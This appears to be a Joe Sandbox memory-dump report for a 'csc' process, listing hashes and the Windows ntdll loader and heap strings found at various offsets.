                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                        • API String ID: 2994545307-2586055223
                                                                                                                                                                        • Opcode ID: 91afe2d465b94ea4e828715e8b5e28a44f46bcf3845b35636565a950608b7dbd
                                                                                                                                                                        • Instruction ID: 8453b280bb2bf063ea08c80c5a69025fdd553e3bbd10e65771cfcc0076ae18a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 91afe2d465b94ea4e828715e8b5e28a44f46bcf3845b35636565a950608b7dbd
                                                                                                                                                                        • Instruction Fuzzy Hash: 80610032204681AFE721DB68CC48FB7BBE9FF80710F080968ED558B291D774D940CB66
                                                                                                                                                                        Strings
                                                                                                                                                                        • LdrpCompleteMapModule, xrefs: 0562A590
                                                                                                                                                                        • MZER, xrefs: 055E16E8
                                                                                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 0562A589
                                                                                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 0562A59A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
                                                                                                                                                                        • API String ID: 0-1409021520
                                                                                                                                                                        • Opcode ID: 64e9de041a3fd1559da8bcb33c55c5ccb10e2d0e7a42c1cce48a05df1d75b55a
                                                                                                                                                                        • Instruction ID: 38bc806cb71556253e92c6669ce242812cf2a8dbb6f14217a460628b072f763c
                                                                                                                                                                        • Opcode Fuzzy Hash: 64e9de041a3fd1559da8bcb33c55c5ccb10e2d0e7a42c1cce48a05df1d75b55a
                                                                                                                                                                        • Instruction Fuzzy Hash: 92513771704F459BD725DB98C948F2A77E5FF01714F1809A9E9929BBD1C7B4E840CB40
                                                                                                                                                                        Strings
                                                                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0562A992
                                                                                                                                                                        • LdrpDynamicShimModule, xrefs: 0562A998
                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0562A9A2
                                                                                                                                                                        • apphelp.dll, xrefs: 055E2462
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                        • API String ID: 0-176724104
                                                                                                                                                                        • Opcode ID: 41ac66b4462f634bbb5c04e5e2f326e14b04529940daca99f352a9c1c8cee544
                                                                                                                                                                        • Instruction ID: 4d851e3a96327b603dfca80dde9daba87d2a5d5e5ade8e0420432f2f135beae1
                                                                                                                                                                        • Opcode Fuzzy Hash: 41ac66b4462f634bbb5c04e5e2f326e14b04529940daca99f352a9c1c8cee544
                                                                                                                                                                        • Instruction Fuzzy Hash: DA310772F20615ABEB24DF99D846E6E7BBAFB84700F150469F8016B740DAF05981CB90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                        • API String ID: 2994545307-1391187441
                                                                                                                                                                        • Opcode ID: 90d83c5a7999390aefb75f94faf8c8f0ea41de18abb11e3bb3ed858583351ab2
                                                                                                                                                                        • Instruction ID: 754f74359156bf25296eab4fb885b85a5ae42732cbf2172b449b8c5cd4cd64bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 90d83c5a7999390aefb75f94faf8c8f0ea41de18abb11e3bb3ed858583351ab2
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D31B432600109EFEB01DB55C88DFEEB7B9FF45630F144055E915AB291DBB0E940DB64
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $ $0
                                                                                                                                                                        • API String ID: 0-3352262554
                                                                                                                                                                        • Opcode ID: a8f735101c0bf6fb42d938a5a4faf779d40dcd7e1e350261a04a3c6f5528cce9
                                                                                                                                                                        • Instruction ID: b9d2fd878a5b6020cbab9798fc2869df5d49ba389abf3696d9b012ff3cc2fae8
                                                                                                                                                                        • Opcode Fuzzy Hash: a8f735101c0bf6fb42d938a5a4faf779d40dcd7e1e350261a04a3c6f5528cce9
                                                                                                                                                                        • Instruction Fuzzy Hash: 353202B16087818FD360CF68C484B6BBBE5BB88344F04492EF99A87350D775E949CB56
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                        • API String ID: 0-4253913091
                                                                                                                                                                        • Opcode ID: 7bd2684e0c20afad7fdda1717d506710fc0088b955aef86813463c52d157a941
                                                                                                                                                                        • Instruction ID: 217aa621ecbbac471a4702035be60ed621e530a276d7aba35234790075e47c92
                                                                                                                                                                        • Opcode Fuzzy Hash: 7bd2684e0c20afad7fdda1717d506710fc0088b955aef86813463c52d157a941
                                                                                                                                                                        • Instruction Fuzzy Hash: 36F18A31B01605DFEB25CF68C898F7AB7B6FB44304F148668E4169B791E734A981CFA1
                                                                                                                                                                        Strings
                                                                                                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 055C1728
                                                                                                                                                                        • HEAP: , xrefs: 055C1596
                                                                                                                                                                        • HEAP[%wZ]: , xrefs: 055C1712
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                        • API String ID: 0-3178619729
                                                                                                                                                                        • Opcode ID: 6c9075d68526507983d4a041786d2c17d77241a4baeda3ed0846abb3b8e2e45c
                                                                                                                                                                        • Instruction ID: 09b551a7753759e3d071cdec4f7234a3263e8e2a47c08db12e08045b23d176a9
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c9075d68526507983d4a041786d2c17d77241a4baeda3ed0846abb3b8e2e45c
                                                                                                                                                                        • Instruction Fuzzy Hash: 51E1D470A04A459FDB15CFA8C495BBABBF2FF44300F18889DE8968B746D734E941CB90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                        • API String ID: 0-1145731471
                                                                                                                                                                        • Opcode ID: 818f7517972897f979ea774a093d34cbf6de38b7eb6625cf55422eec01045a80
                                                                                                                                                                        • Instruction ID: 7b2ffd912861ec3002fd6d8622ebf6d21bbedce57d5329fecf35d36c7cedf641
                                                                                                                                                                        • Opcode Fuzzy Hash: 818f7517972897f979ea774a093d34cbf6de38b7eb6625cf55422eec01045a80
                                                                                                                                                                        • Instruction Fuzzy Hash: 22B17C31B08A559FCB25CF99C980BADBBB6BF44714F14496DE852EBB80D738A840CF51
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                        • API String ID: 0-2391371766
                                                                                                                                                                        • Opcode ID: 612eff196792f65cdce8e14722df74d2e3d7e3b4fc9074fc3918f65b7f492b90
                                                                                                                                                                        • Instruction ID: d5ae3da025dcab78bfcddb1eb2f9a176f18d86b5952510bf11b5214cb6a81dbc
                                                                                                                                                                        • Opcode Fuzzy Hash: 612eff196792f65cdce8e14722df74d2e3d7e3b4fc9074fc3918f65b7f492b90
                                                                                                                                                                        • Instruction Fuzzy Hash: 8FB1AD72758346AFE721DE54C885F6BBBE8BB44714F000929FA419B790DB70E884CF96
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                        • API String ID: 0-318774311
                                                                                                                                                                        • Opcode ID: e83e93c2d9f86383ec8af87adfd68964aab043c989cde005641378b9892b032f
                                                                                                                                                                        • Instruction ID: 25efd85f828a5386d5a5d805ea97bd564b5b7ce09f851c2f438d1b7c8cf6e1ce
                                                                                                                                                                        • Opcode Fuzzy Hash: e83e93c2d9f86383ec8af87adfd68964aab043c989cde005641378b9892b032f
                                                                                                                                                                        • Instruction Fuzzy Hash: 968178B5748341ABD325DF24C848B6AB7E9FF84BA0F04092DBD819B790E774D904CB66
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                        • API String ID: 0-3870751728
                                                                                                                                                                        • Opcode ID: d5c30efb48a8904c327b1772b748c226a466e3dc6c886c253c36287b5db3bfe2
                                                                                                                                                                        • Instruction ID: e4e21bae25aeebdac6ac5e50ba5c6af2f9831fd5b777b2bdd2568fe6f5726481
                                                                                                                                                                        • Opcode Fuzzy Hash: d5c30efb48a8904c327b1772b748c226a466e3dc6c886c253c36287b5db3bfe2
                                                                                                                                                                        • Instruction Fuzzy Hash: D2912CB0E002159FDB18CFA9C484BADBBF2FF48314F14816AD905AB791E7759842CF94
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                        • API String ID: 0-373624363
                                                                                                                                                                        • Opcode ID: da829cc7d34ceaaa237d40cf236ee9e774b13fd97ed2f7afa3ccf87046b0c705
                                                                                                                                                                        • Instruction ID: e59b8fb797a09b719e60796b979ce06d5ce0a60966cc18758aa3c687ea8dac3c
                                                                                                                                                                        • Opcode Fuzzy Hash: da829cc7d34ceaaa237d40cf236ee9e774b13fd97ed2f7afa3ccf87046b0c705
                                                                                                                                                                        • Instruction Fuzzy Hash: 1891CC71A08659CFDF21CF98C541BAEBBB2FF00324F544599E852AB390D7789A80CF94
                                                                                                                                                                        Strings
                                                                                                                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0569B82A
                                                                                                                                                                        • TargetNtPath, xrefs: 0569B82F
                                                                                                                                                                        • GlobalizationUserSettings, xrefs: 0569B834
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                        • API String ID: 0-505981995
                                                                                                                                                                        • Opcode ID: 124ede90e1a8fe72e3e0a77090ea02ffa6e967532cef916107097912e741ab06
                                                                                                                                                                        • Instruction ID: f6c8f724d8feafe522ca189da17d7de62054acb34084f6fa348e3552065094dd
                                                                                                                                                                        • Opcode Fuzzy Hash: 124ede90e1a8fe72e3e0a77090ea02ffa6e967532cef916107097912e741ab06
                                                                                                                                                                        • Instruction Fuzzy Hash: 0761BF32914629ABDF35DF54DC88BDAB7B8BF09710F0101E9E509AB260DB749E80CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0561E6C6
                                                                                                                                                                        • HEAP: , xrefs: 0561E6B3
                                                                                                                                                                        • HEAP[%wZ]: , xrefs: 0561E6A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                        • API String ID: 0-1340214556
                                                                                                                                                                        • Opcode ID: 78642ef1cd3cf6f03c6dcc8af80104a0fd4d86fc3f8e0fddd5040a674ad55988
                                                                                                                                                                        • Instruction ID: 04d9722ddbf666178ba9bc030f946f430b7b16ed5ffb1875c2658e8c942692c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 78642ef1cd3cf6f03c6dcc8af80104a0fd4d86fc3f8e0fddd5040a674ad55988
                                                                                                                                                                        • Instruction Fuzzy Hash: 7451F731704645EFE722DBA8C848FA6BBF9FF45700F0844A4E9418B692D7B5ED80CB64
                                                                                                                                                                        Strings
                                                                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 056382DE
                                                                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 056382D7
                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 056382E8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                        • API String ID: 0-1783798831
                                                                                                                                                                        • Opcode ID: 95ec24577f8ce7245424c36cd62a101972886587f96d19ba2e18d93171eb3ddd
                                                                                                                                                                        • Instruction ID: 0227076a70463fe1befb1633faf8ac50312dbc496cc7d0886e66569e2921f798
                                                                                                                                                                        • Opcode Fuzzy Hash: 95ec24577f8ce7245424c36cd62a101972886587f96d19ba2e18d93171eb3ddd
                                                                                                                                                                        • Instruction Fuzzy Hash: D841C672669309EBD720EB64D84AF5B7BE9FF84750F00492EBA45D7250EB70D840CB92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                        • API String ID: 0-1151232445
                                                                                                                                                                        • Opcode ID: 31765e5d34cbdabc22bca261fcc4be3cefd4861d8a115b2fd1d2751d3c115351
                                                                                                                                                                        • Instruction ID: e397dbcdc6a9eb11c4c258656d8786ae6c082813f88fa56d2167c98a6f346676
                                                                                                                                                                        • Opcode Fuzzy Hash: 31765e5d34cbdabc22bca261fcc4be3cefd4861d8a115b2fd1d2751d3c115351
                                                                                                                                                                        • Instruction Fuzzy Hash: 9D41E4703152408FFF29CE9DC088BB977A2FF89204F1C44A9D9468B746DAB4D885C795
                                                                                                                                                                        Strings
                                                                                                                                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 05631B39
                                                                                                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 05631B4A
                                                                                                                                                                        • LdrpAllocateTls, xrefs: 05631B40
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                        • API String ID: 0-4274184382
                                                                                                                                                                        • Opcode ID: 4e8b7f99472249db1d51c98f9925e37f4303ee2a2cd1116dd38424e7591a3c66
                                                                                                                                                                        • Instruction ID: e144336a719ee9dcee1ed65e18775bb4ba61173818b64330b170ddcb3926d5ba
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e8b7f99472249db1d51c98f9925e37f4303ee2a2cd1116dd38424e7591a3c66
                                                                                                                                                                        • Instruction Fuzzy Hash: CC419D75B01609EFDB15DFA8C842BAEBBF6FF88704F148519E406A7310EB75A800CB94
                                                                                                                                                                        Strings
                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 05644899
                                                                                                                                                                        • LdrpCheckRedirection, xrefs: 0564488F
                                                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 05644888
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                                                        • Opcode ID: f5699c65303cc97fbb8b555d12ef853b621beae94acdaa427ea2263fdc7264f6
                                                                                                                                                                        • Instruction ID: db85f57b0cb7f0236145bfac78a382e512a3d6c26f41860ee536415cfaeb3ba7
                                                                                                                                                                        • Opcode Fuzzy Hash: f5699c65303cc97fbb8b555d12ef853b621beae94acdaa427ea2263fdc7264f6
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C41DE32A146509FCF61CE68D842B677BE9FF49A92B050569EC49A7711EB30E801CF91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: true
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.00000000056BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5590000_csc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                        • API String ID: 0-1373925480
